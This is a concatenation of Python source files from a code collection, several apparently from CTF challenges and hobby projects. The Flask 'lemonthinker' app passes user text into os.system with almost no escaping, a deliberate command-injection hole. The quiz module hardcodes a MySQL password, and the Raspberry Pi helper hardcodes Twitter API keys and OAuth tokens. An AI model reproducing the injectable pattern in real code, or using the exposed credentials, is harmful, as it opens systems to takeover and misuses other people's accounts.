# catch if input is no valid json
except:
sys.stderr.write('!!error: no data block in json')
exit(2)
| 25.526316 | 71 | 0.652062 |
53df3216d619040fc2551d1e35eda4fe2e177604 | 3,868 | py | Python | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | WifiEnigma/BattleAI/question.py | Puzzlebox-IMT/Puzzlebox | 6b80e22a4aee3228140692bd6352de18b2f6a96d | [
"MIT"
] | null | null | null | import mysql.connector
import random
from voice import synthetize_voice, delete_wav
def AllQuestionAI(id_theme):
i = 0
#CONNEXION A LA BDD
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
#EXECUTER LA REQUETE AVEC LA BDD
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
#RECUPERATION DES INFORMATIONS
rows = cursor.fetchall()
if rows:
for line in rows:
i += 1
enonce = line[1]
proposition1 = line[2]
proposition2 = line[3]
proposition3 = line[4]
proposition4 = line[5]
reponse = line[5]
print("*******************************************************************************")
print(" QUESTION ",i," ")
print("*******************************************************************************")
print("ENONCE : ", enonce)
print("PROPOSITION 1 : ", proposition1)
print("PROPOSITION 2 : ", proposition2)
print("PROPOSITION 3 : ", proposition3)
print("PROPOSITION 4 : ", proposition4)
print("REPONSE : ", reponse)
else:
print("Ce thème ne contient pas de questions")
def questionAI(id_theme):
i = 0
#CONNEXION A LA BDD
conn = mysql.connector.connect(host="localhost",
user="phpmyadmin", password="Vince@Mysql1997",
database="Puzzlebox")
cursor = conn.cursor()
#EXECUTER LA REQUETE AVEC LA BDD
query = ("SELECT * FROM Question INNER JOIN themes_questions ON Question.ID_QUESTION = themes_questions.ID_QUESTION WHERE ID_THEME=%s")
cursor.execute(query, (id_theme, ))
#RECUPERATION DES INFORMATIONS
rows = cursor.fetchall()
if rows:
nb_rows = len(rows)
num_question = random.randint(1, nb_rows)
#L'index de la liste commence à zéro, il faut donc décaler d'un le numéro
num_question = num_question - 1
question = rows[num_question]
result = [] #Tab which stores the query results
#RECUPERATION DES TUPLES
result.append(question[1])
result.append(question[2])
result.append(question[3])
result.append(question[4])
result.append(question[5])
result.append(question[5]) #This last one is the answer
print("*******************************************************************************")
print(" QUESTION ",num_question+1," ")
print("*******************************************************************************")
print("ENONCE : ", result[0])
print("PROPOSITION 1 : ", result[1])
print("PROPOSITION 2 : ", result[2])
print("PROPOSITION 3 : ", result[3])
print("PROPOSITION 4 : ", result[4])
print("REPONSE : ", result[5])
#complete_question = ''.join(complete_question) #Convert tuple into string
return result
else:
print("Ce thème ne contient pas de questions")
def tell_question(question):
synthetize_voice(question[0])
for i in range(1,5) :
num_prop = "Proposition {} ".format(i)
num_prop = ''.join(num_prop)
line = ''.join(question[i])
line = num_prop + line
synthetize_voice(line)
delete_wav()
def quiz():
counter = 1
while(counter <= 5):
questionAI(1)
if (__name__ == '__main__'):
result = questionAI(1)
tell_question(result)
| 31.447154 | 140 | 0.520941 |
54e3b8446107d9bccd2d0bc314395d7a3117387b | 7,069 | py | Python | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 226 | 2018-12-29T01:13:49.000Z | 2022-03-30T19:16:31.000Z | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 5,100 | 2019-01-14T18:19:25.000Z | 2022-03-31T23:08:36.000Z | src/resources/clients/python_client/visitstate.py | visit-dav/vis | c08bc6e538ecd7d30ddc6399ec3022b9e062127e | [
"BSD-3-Clause"
] | 84 | 2019-01-24T17:41:50.000Z | 2022-03-10T10:01:46.000Z | import sys
class RPCType(object):
CloseRPC = 0
DetachRPC = 1
AddWindowRPC = 2
DeleteWindowRPC = 3
SetWindowLayoutRPC = 4
SetActiveWindowRPC = 5
ClearWindowRPC = 6
ClearAllWindowsRPC = 7
OpenDatabaseRPC = 8
CloseDatabaseRPC = 9
ActivateDatabaseRPC = 10
CheckForNewStatesRPC = 11
CreateDatabaseCorrelationRPC = 12
AlterDatabaseCorrelationRPC = 13
DeleteDatabaseCorrelationRPC = 14
ReOpenDatabaseRPC = 15
ReplaceDatabaseRPC = 16
OverlayDatabaseRPC = 17
OpenComputeEngineRPC = 18
CloseComputeEngineRPC = 19
AnimationSetNFramesRPC = 20
AnimationPlayRPC = 21
AnimationReversePlayRPC = 22
AnimationStopRPC = 23
TimeSliderNextStateRPC = 24
TimeSliderPreviousStateRPC = 25
SetTimeSliderStateRPC = 26
SetActiveTimeSliderRPC = 27
AddPlotRPC = 28
SetPlotFrameRangeRPC = 29
DeletePlotKeyframeRPC = 30
MovePlotKeyframeRPC = 31
DeleteActivePlotsRPC = 32
HideActivePlotsRPC = 33
DrawPlotsRPC = 34
DisableRedrawRPC = 35
RedrawRPC = 36
SetActivePlotsRPC = 37
ChangeActivePlotsVarRPC = 38
AddOperatorRPC = 39
AddInitializedOperatorRPC = 40
PromoteOperatorRPC = 41
DemoteOperatorRPC = 42
RemoveOperatorRPC = 43
RemoveLastOperatorRPC = 44
RemoveAllOperatorsRPC = 45
SaveWindowRPC = 46
SetDefaultPlotOptionsRPC = 47
SetPlotOptionsRPC = 48
SetDefaultOperatorOptionsRPC = 49
SetOperatorOptionsRPC = 50
WriteConfigFileRPC = 51
ConnectToMetaDataServerRPC = 52
IconifyAllWindowsRPC = 53
DeIconifyAllWindowsRPC = 54
ShowAllWindowsRPC = 55
HideAllWindowsRPC = 56
UpdateColorTableRPC = 57
SetAnnotationAttributesRPC = 58
SetDefaultAnnotationAttributesRPC = 59
ResetAnnotationAttributesRPC = 60
SetKeyframeAttributesRPC = 61
SetPlotSILRestrictionRPC = 62
SetViewAxisArrayRPC = 63
SetViewCurveRPC = 64
SetView2DRPC = 65
SetView3DRPC = 66
ResetPlotOptionsRPC = 67
ResetOperatorOptionsRPC = 68
SetAppearanceRPC = 69
ProcessExpressionsRPC = 70
SetLightListRPC = 71
SetDefaultLightListRPC = 72
ResetLightListRPC = 73
SetAnimationAttributesRPC = 74
SetWindowAreaRPC = 75
PrintWindowRPC = 76
ResetViewRPC = 77
RecenterViewRPC = 78
ToggleAllowPopupRPC = 79
ToggleMaintainViewModeRPC = 80
ToggleBoundingBoxModeRPC = 81
ToggleCameraViewModeRPC = 82
TogglePerspectiveViewRPC = 83
ToggleSpinModeRPC = 84
ToggleLockTimeRPC = 85
ToggleLockToolsRPC = 86
ToggleLockViewModeRPC = 87
ToggleFullFrameRPC = 88
UndoViewRPC = 89
RedoViewRPC = 90
InvertBackgroundRPC = 91
ClearPickPointsRPC = 92
SetWindowModeRPC = 93
EnableToolRPC = 94
SetToolUpdateModeRPC = 95
CopyViewToWindowRPC = 96
CopyLightingToWindowRPC = 97
CopyAnnotationsToWindowRPC = 98
CopyPlotsToWindowRPC = 99
ClearCacheRPC = 100
ClearCacheForAllEnginesRPC = 101
SetViewExtentsTypeRPC = 102
ClearRefLinesRPC = 103
SetRenderingAttributesRPC = 104
QueryRPC = 105
CloneWindowRPC = 106
SetMaterialAttributesRPC = 107
SetDefaultMaterialAttributesRPC = 108
ResetMaterialAttributesRPC = 109
SetPlotDatabaseStateRPC = 110
DeletePlotDatabaseKeyframeRPC = 111
MovePlotDatabaseKeyframeRPC = 112
ClearViewKeyframesRPC = 113
DeleteViewKeyframeRPC = 114
MoveViewKeyframeRPC = 115
SetViewKeyframeRPC = 116
OpenMDServerRPC = 117
EnableToolbarRPC = 118
HideToolbarsRPC = 119
HideToolbarsForAllWindowsRPC = 120
ShowToolbarsRPC = 121
ShowToolbarsForAllWindowsRPC = 122
SetToolbarIconSizeRPC = 123
SaveViewRPC = 124
SetGlobalLineoutAttributesRPC = 125
SetPickAttributesRPC = 126
ExportColorTableRPC = 127
ExportEntireStateRPC = 128
ImportEntireStateRPC = 129
ImportEntireStateWithDifferentSourcesRPC = 130
ResetPickAttributesRPC = 131
AddAnnotationObjectRPC = 132
HideActiveAnnotationObjectsRPC = 133
DeleteActiveAnnotationObjectsRPC = 134
RaiseActiveAnnotationObjectsRPC = 135
LowerActiveAnnotationObjectsRPC = 136
SetAnnotationObjectOptionsRPC = 137
SetDefaultAnnotationObjectListRPC = 138
ResetAnnotationObjectListRPC = 139
ResetPickLetterRPC = 140
SetDefaultPickAttributesRPC = 141
ChooseCenterOfRotationRPC = 142
SetCenterOfRotationRPC = 143
SetQueryOverTimeAttributesRPC = 144
SetDefaultQueryOverTimeAttributesRPC = 145
ResetQueryOverTimeAttributesRPC = 146
ResetLineoutColorRPC = 147
SetInteractorAttributesRPC = 148
SetDefaultInteractorAttributesRPC = 149
ResetInteractorAttributesRPC = 150
GetProcInfoRPC = 151
SendSimulationCommandRPC = 152
UpdateDBPluginInfoRPC = 153
ExportDBRPC = 154
SetTryHarderCyclesTimesRPC = 155
OpenClientRPC = 156
OpenGUIClientRPC = 157
OpenCLIClientRPC = 158
SuppressQueryOutputRPC = 159
SetQueryFloatFormatRPC = 160
SetMeshManagementAttributesRPC = 161
SetDefaultMeshManagementAttributesRPC = 162
ResetMeshManagementAttributesRPC = 163
ResizeWindowRPC = 164
MoveWindowRPC = 165
MoveAndResizeWindowRPC = 166
SetStateLoggingRPC = 167
ConstructDataBinningRPC = 168
RequestMetaDataRPC = 169
SetTreatAllDBsAsTimeVaryingRPC = 170
SetCreateMeshQualityExpressionsRPC = 171
SetCreateTimeDerivativeExpressionsRPC = 172
SetCreateVectorMagnitudeExpressionsRPC = 173
CopyActivePlotsRPC = 174
SetPlotFollowsTimeRPC = 175
TurnOffAllLocksRPC = 176
SetDefaultFileOpenOptionsRPC = 177
SetSuppressMessagesRPC = 178
ApplyNamedSelectionRPC = 179
CreateNamedSelectionRPC = 180
DeleteNamedSelectionRPC = 181
LoadNamedSelectionRPC = 182
SaveNamedSelectionRPC = 183
SetNamedSelectionAutoApplyRPC = 184
UpdateNamedSelectionRPC = 185
InitializeNamedSelectionVariablesRPC = 186
MenuQuitRPC = 187
SetPlotDescriptionRPC = 188
MovePlotOrderTowardFirstRPC = 189
MovePlotOrderTowardLastRPC = 190
SetPlotOrderToFirstRPC = 191
SetPlotOrderToLastRPC = 192
RenamePickLabelRPC = 193
GetQueryParametersRPC = 194
DDTConnectRPC = 195
DDTFocusRPC = 196
ReleaseToDDTRPC = 197
MaxRPC = 198
| 34.651961 | 54 | 0.660914 |
4ad523fc14942dd490ad41c526c6171f60967ac3 | 476 | py | Python | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 15 | 2020-04-24T20:18:11.000Z | 2022-01-31T21:05:05.000Z | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 2 | 2021-05-19T07:15:09.000Z | 2022-03-07T08:29:34.000Z | Backend/models/risklayerPrognosis.py | dbvis-ukon/coronavis | f00374ac655c9d68541183d28ede6fe5536581dc | [
"Apache-2.0"
] | 4 | 2020-04-27T16:20:13.000Z | 2021-02-23T10:39:42.000Z | from db import db
class RisklayerPrognosis(db.Model):
__tablename__ = 'risklayer_prognosis'
datenbestand = db.Column(db.TIMESTAMP, primary_key=True, nullable=False)
prognosis = db.Column(db.Float, nullable=False)
# class RisklayerPrognosisSchema(SQLAlchemyAutoSchema):
# class Meta:
# strict = True
# model = RisklayerPrognosis
#
# timestamp = fields.Timestamp(data_key="datenbestand")
# prognosis = fields.Number(data_key="prognosis")
| 28 | 76 | 0.72479 |
ab2add18b201d727e235b13fba3fa52b34c35680 | 404 | py | Python | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | TreeModelLib/BelowgroundCompetition/__init__.py | jvollhueter/pyMANGA-1 | 414204a394d44405225b4b8224b19464c1006f1d | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 8 15:25:03 2018
@author: bathmann
"""
from .BelowgroundCompetition import BelowgroundCompetition
from .SimpleTest import SimpleTest
from .FON import FON
from .OGSWithoutFeedback import OGSWithoutFeedback
from .OGSLargeScale3D import OGSLargeScale3D
from .OGS.helpers import CellInformation
from .FixedSalinity import FixedSalinity
| 25.25 | 58 | 0.799505 |
dbcc6f4ccb0dabce5252e1dd4108228b2c863f99 | 721 | py | Python | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | 2 | 2021-08-09T17:08:12.000Z | 2021-08-09T17:08:17.000Z | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | null | null | null | web/web-lemonthinker/src/app/app.py | NoXLaw/RaRCTF2021-Challenges-Public | 1a1b094359b88f8ebbc83a6b26d27ffb2602458f | [
"MIT"
] | 1 | 2021-10-09T16:51:56.000Z | 2021-10-09T16:51:56.000Z | from flask import Flask, request, redirect, url_for
import os
import random
import string
import time # lemonthink
clean = time.time()
app = Flask(__name__)
chars = list(string.ascii_letters + string.digits)
@app.route('/')
def main():
return open("index.html").read()
@app.route('/generate', methods=['POST'])
def upload():
global clean
if time.time() - clean > 60:
os.system("rm static/images/*")
clean = time.time()
text = request.form.getlist('text')[0]
text = text.replace("\"", "")
filename = "".join(random.choices(chars,k=8)) + ".png"
os.system(f"python3 generate.py {filename} \"{text}\"")
return redirect(url_for('static', filename='images/' + filename), code=301) | 28.84 | 79 | 0.653259 |
91da549f96f9ccca48e20a796a48546be83febae | 206 | py | Python | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 2,085 | 2019-04-17T13:10:40.000Z | 2022-03-30T21:51:46.000Z | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 79 | 2019-04-18T14:42:55.000Z | 2022-03-07T08:15:43.000Z | exercises/ja/exc_03_16_01.py | Jette16/spacy-course | 32df0c8f6192de6c9daba89740a28c0537e4d6a0 | [
"MIT"
] | 361 | 2019-04-17T13:34:32.000Z | 2022-03-28T04:42:45.000Z | import spacy
nlp = spacy.load("ja_core_news_sm")
text = (
"チックフィレイはジョージア州カレッジパークに本社を置く、"
"チキンサンドを専門とするアメリカのファストフードレストランチェーンです。"
)
# トークナイズのみ行う
doc = nlp(text)
print([token.text for token in doc])
| 17.166667 | 42 | 0.73301 |
f482d9773506167246440d9307b62395f61caa1a | 2,353 | py | Python | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | ais3-pre-exam-2022-writeup/Misc/JeetQode/chall/problems/astmath.py | Jimmy01240397/balsn-2021-writeup | 91b71dfbddc1c214552280b12979a82ee1c3cb7e | [
"MIT"
] | null | null | null | from problem import Problem
from typing import Any, Tuple
from random import randint
import ast
import json
def gen_num():
return str(randint(1, 9))
def gen_op():
return "+-*/"[randint(0, 3)]
def gen_expr(depth):
if randint(0, depth) == 0:
l = gen_expr(depth + 1)
r = gen_expr(depth + 1)
op = gen_op()
return f"({l}{op}{r})"
return f"({gen_num()})"
class ASTMath(Problem):
@property
def name(self) -> str:
return "AST Math"
@property
def desciption(self) -> str:
return """
Input: An AST of Python's arithmetic expression (only +,-,*,/)
Output: Result number
Examples:
Input: {"body": {"left": {"value": 1, "kind": null, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 1}, "op": "<_ast.Add object at 0x7f0387ccde20>", "right": {"value": 2, "kind": null, "lineno": 1, "col_offset": 2, "end_lineno": 1, "end_col_offset": 3}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 3}}
Output: 3
Input: {"body": {"left": {"left": {"value": 8, "kind": null, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 2}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 7, "kind": null, "lineno": 1, "col_offset": 3, "end_lineno": 1, "end_col_offset": 4}, "lineno": 1, "col_offset": 1, "end_lineno": 1, "end_col_offset": 4}, "op": "<_ast.Sub object at 0x7f20eb76ae80>", "right": {"left": {"value": 6, "kind": null, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 8}, "op": "<_ast.Mult object at 0x7f20eb76aee0>", "right": {"value": 3, "kind": null, "lineno": 1, "col_offset": 9, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 7, "end_lineno": 1, "end_col_offset": 10}, "lineno": 1, "col_offset": 0, "end_lineno": 1, "end_col_offset": 11}}
Output: 38
"""
@property
def rounds(self) -> int:
return 10
def dumps(self, x):
return json.dumps(
x, default=lambda x: x.__dict__ if len(x.__dict__) else str(x)
)
def generate_testcase(self) -> Tuple[bool, Any]:
l = gen_expr(1)
r = gen_expr(1)
op = gen_op()
expr = f"{l}{op}{r}"
try:
result = eval(expr)
except ZeroDivisionError:
return self.generate_testcase()
return ast.parse(expr, mode="eval"), result
| 37.349206 | 800 | 0.592435 |
beaa8784fc43c71bc8bb5120744ac9a157c4e2a7 | 2,387 | py | Python | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | null | null | null | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | null | null | null | PathPlanning/run.py | CandleStein/VAlg | 43aecdd351954d316f132793cf069b70bf2e5cc2 | [
"MIT"
] | 1 | 2020-09-25T18:31:34.000Z | 2020-09-25T18:31:34.000Z | from planning_framework import path
import cv2 as cv
import numpy as np
import argparse
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description="Path Planning Visualisation")
parser.add_argument(
"-n",
"--n_heuristic",
default=2,
help="Heuristic for A* Algorithm (default = 2). 0 for Dijkstra's Algorithm",
)
args = parser.parse_args()
N_H = int(args.n_heuristic)
drawing = False # true if mouse is pressed
mode = "obs" # if True, draw rectangle. Press 'm' to toggle to curve
ix, iy = -1, -1
sx, sy = 0, 0
dx, dy = 50, 50
# mouse callback function
def draw(event, x, y, flags, param):
global mode, sx, sy, dx, dy, drawing
if event == cv.EVENT_LBUTTONDOWN:
drawing = True
elif event == cv.EVENT_MOUSEMOVE:
if drawing == True:
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif event == cv.EVENT_LBUTTONUP:
drawing = False
if mode == "obs":
cv.rectangle(img, (x - 5, y - 5), (x + 5, y + 5), (255, 255, 255), -1)
elif mode == "src":
cv.circle(img, (x, y), 5, (255, 0, 0), -1)
sx, sy = x, y
elif mode == "dst":
cv.circle(img, (x, y), 5, (0, 255, 0), -1)
dx, dy = x, y
img = np.zeros((512, 512, 3), np.uint8)
inv_im = np.ones(img.shape) * 255
cv.namedWindow("Draw the Occupancy Map")
cv.setMouseCallback("Draw the Occupancy Map", draw)
while 1:
cv.imshow("Draw the Occupancy Map", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
mode = "src"
img_ = img
cv.namedWindow("Set the Starting Point")
cv.setMouseCallback("Set the Starting Point", draw)
while 1:
cv.imshow("Set the Starting Point", inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
# cv.waitKey(20)
cv.destroyAllWindows()
mode = "dst"
end = "Set the End Point"
cv.namedWindow(end)
cv.setMouseCallback(end, draw)
while cv.getWindowProperty(end, 0) >= 0:
cv.imshow(end, inv_im - img)
if cv.waitKey(20) & 0xFF == 27:
break
cv.destroyAllWindows()
img = cv.resize(img_, (50, 50), interpolation=cv.INTER_AREA)
inv_img = np.ones(img.shape)
np.savetxt("map.txt", np.array(img[:, :, 0]))
plt.imshow(inv_img - img)
start = np.array([sx, sy]) * 50 // 512
end = np.array([dx, dy]) * 50 // 512
path(start, end, N_H)
| 26.820225 | 86 | 0.607038 |
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf | 316 | py | Python | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-17T03:35:03.000Z | 2021-12-08T06:00:31.000Z | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | null | null | null | ScapyDoS-main/simp.py | Zusyaku/Termux-And-Lali-Linux-V2 | b1a1b0841d22d4bf2cc7932b72716d55f070871e | [
"Apache-2.0"
] | 2 | 2021-11-05T18:07:48.000Z | 2022-02-24T21:25:07.000Z | from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1 | 22.571429 | 42 | 0.550633 |
a3b8b5beaa0f8d8ecd98462fe75b978547dc1472 | 4,248 | py | Python | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | Python X/Dictionaries in python.py | nirobio/puzzles | fda8c84d8eefd93b40594636fb9b7f0fde02b014 | [
"MIT"
] | null | null | null | {
"cells": [
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"# dictionaries, look-up tables & key-value pairs\n",
"# d = {} OR d = dict()\n",
"# e.g. d = {\"George\": 24, \"Tom\": 32}\n",
"\n",
"d = {}\n",
"\n"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"d[\"George\"] = 24"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"d[\"Tom\"] = 32\n",
"d[\"Jenny\"] = 16"
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"{'George': 24, 'Tom': 32, 'Jenny': 16}\n"
]
}
],
"source": [
"print(d)"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"ename": "NameError",
"evalue": "name 'Jenny' is not defined",
"output_type": "error",
"traceback": [
"\u001b[0;31m---------------------------------------------------------------------------\u001b[0m",
"\u001b[0;31mNameError\u001b[0m Traceback (most recent call last)",
"\u001b[0;32m<ipython-input-5-0bdfff196d23>\u001b[0m in \u001b[0;36m<module>\u001b[0;34m\u001b[0m\n\u001b[0;32m----> 1\u001b[0;31m \u001b[0mprint\u001b[0m\u001b[0;34m(\u001b[0m\u001b[0md\u001b[0m\u001b[0;34m[\u001b[0m\u001b[0mJenny\u001b[0m\u001b[0;34m]\u001b[0m\u001b[0;34m)\u001b[0m\u001b[0;34m\u001b[0m\u001b[0;34m\u001b[0m\u001b[0m\n\u001b[0m",
"\u001b[0;31mNameError\u001b[0m: name 'Jenny' is not defined"
]
}
],
"source": [
"print(d[Jenny])"
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"32\n"
]
}
],
"source": [
"print(d[\"Tom\"])"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [],
"source": [
"d[\"Jenny\"] = 20"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"20\n"
]
}
],
"source": [
"print(d[\"Jenny\"])"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"# keys are strings or numbers \n",
"\n",
"d[10] = 100"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"100\n"
]
}
],
"source": [
"print(d[10])"
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"# how to iterate over key-value pairs"
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"key:\n",
"George\n",
"value:\n",
"24\n",
"\n",
"key:\n",
"Tom\n",
"value:\n",
"32\n",
"\n",
"key:\n",
"Jenny\n",
"value:\n",
"20\n",
"\n",
"key:\n",
"10\n",
"value:\n",
"100\n",
"\n"
]
}
],
"source": [
" for key, value in d.items():\n",
" print(\"key:\")\n",
" print(key)\n",
" print(\"value:\")\n",
" print(value)\n",
" print(\"\")"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.7.6"
}
},
"nbformat": 4,
"nbformat_minor": 4
}
| 18.88 | 354 | 0.439266 |
4367a493fbe503c8a8ff6c69a39f88b75c5407aa | 125 | py | Python | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 18 | 2019-02-14T13:10:07.000Z | 2021-11-26T07:10:13.000Z | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 2 | 2019-02-17T14:06:42.000Z | 2019-09-15T18:05:54.000Z | kts/core/types.py | konodyuk/kts | 3af5ccbf1d2089cb41d171626fcde4b0ba5aa8a7 | [
"MIT"
] | 2 | 2019-09-15T13:12:42.000Z | 2020-04-15T14:05:54.000Z | from typing import Union
import pandas as pd
from kts.core.frame import KTSFrame
AnyFrame = Union[pd.DataFrame, KTSFrame]
| 15.625 | 40 | 0.792 |
717864c0c5586a731d9e7b34b779d6af81159c7a | 4,509 | py | Python | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | slcyGeneral.py | mirrorcoloured/slcypi | c47975b3523f770d12a521c82e2dfca181e3f35b | [
"MIT"
] | null | null | null | # Python 2.7.1
import RPi.GPIO as GPIO
from twython import Twython
import time
import sys
import os
import pygame
APP_KEY='zmmlyAJzMDIntLpDYmSH98gbw'
APP_SECRET='ksfSVa2hxvTQKYy4UR9tjpb57CAynMJDsygz9qOyzlH24NVwpW'
OAUTH_TOKEN='794094183841566720-BagrHW91yH8C3Mdh9SOlBfpL6wrSVRW'
OAUTH_TOKEN_SECRET='d0Uucq2dkSHrFHZGLM1X8Hw05d80ajKYGl1zTRxZQSKTm'
applepislcy = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
### GENERAL ###
def Cleanup():
GPIO.cleanup()
def Sleep(seconds):
"""Puts the program to sleep"""
time.sleep(seconds)
def Alert(channel):
"""Simple alert function for testing event interrupts"""
print('Alert on channel',channel)
def TimeString():
"""Returns the current time"""
t = time.localtime()
return str(t[0])+'.'+str(t[1])+'.'+str(t[2])+'.'+str(t[3])+'.'+str(t[4])+'.'+str(t[5])
def LoadPins(mapping,inp):
"""Organizes an input into a pin mapping dict
mapping <list>, ['IA','IB']
inp <dict>, <list>, <int> {'IA':1,'IB':2}, [1,2]
"""
if type(inp) is int and len(mapping) == 1:
return {mapping[0]:inp}
elif type(inp) is list and len(mapping) == len(inp):
o = {}
for i in range(len(inp)):
o[mapping[i]] = inp[i]
return o
elif type(inp) is dict:
return inp
else:
print('Invalid input for pins:',inp,type(inp))
print('Expected:',mapping)
return {}
def BoolToSign(inp):
"""Converts boolean bits into signed bits
0 -> -1
1 -> 1"""
return (inp * 2) - 1
def SignToBool(inp):
"""Converts signed bits into boolean bits
-1 -> 0
1 -> 1"""
return (inp + 1) / 2
### PYGAME ###
def WindowSetup(size=(300,50),caption='',text='',background=(0,0,0),foreground=(255,255,255)):
"""Sets up a pygame window to take keyboard input
size <tuple>, width by height
caption <str>, window title bar
text <str>, text to display in window, accepts \n
background <tuple>, foreground <tuple>, (r,g,b) color
"""
pygame.init()
screen = pygame.display.set_mode(size,0,32)
pygame.display.set_caption(caption)
myfont = pygame.font.SysFont('Monospace',15)
labels = []
